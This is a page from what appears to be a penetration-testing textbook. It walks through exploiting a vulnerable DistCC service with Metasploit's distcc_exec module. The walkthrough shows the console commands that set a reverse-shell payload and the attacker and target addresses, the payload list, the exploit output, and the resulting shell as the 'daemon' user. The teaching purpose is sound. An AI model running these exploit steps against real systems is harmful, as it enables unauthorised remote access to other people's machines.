background image

Simulated Penetration Test

263

when performing the attack. (Remember that in a penetration test we can’t 
always rely on the defaults to be successful.)

Our scan finds that port 3632 is open and associated with 

DistCC

. An 

online search tells us that 

DistCC

 is a program that distributes builds of C/C++ 

code to several machines across a network, and it is vulnerable to an attack. 
(When performing penetration tests, you will often encounter unfamiliar 
applications and products, and you will need to research the application before 
you can attack it.)

msf exploit(distcc_exec) > 

set payload linux/x86/shell_reverse_tcp

payload => linux/x86/shell_reverse_tcp
msf exploit(distcc_exec) > 

set LHOST 172.16.32.129

LHOST => 172.16.32.129
shomsf exploit(distcc_exec) > 

set RHOST 172.16.32.162

RHOST => 172.16.32.162
msf exploit(distcc_exec) > 

show payloads

Compatible Payloads
===================

   Name                   Rank    Description
   ----                   ----    -----------
   cmd/unix/bind_perl     normal  Unix Command Shell, Bind TCP (via perl)
   cmd/unix/bind_ruby     normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/generic       normal  Unix Command, Generic command execution
   cmd/unix/reverse       normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl  normal  Unix Command Shell, Reverse TCP (via perl)
   cmd/unix/reverse_ruby  normal  Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > 

set payload cmd/unix/reverse

payload => cmd/unix/reverse
msf exploit(distcc_exec) > 

exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo q6Td9oaTrOkXsBXS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "q6Td9oaTrOkXsBXS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.32.129:4444 -> 172.16.32.162:47002) at 2010-05-

22 00:08:04 -0400

whoami

daemon

mkdir /root/moo

mkdir: cannot create directory '/root/moo': Permission denied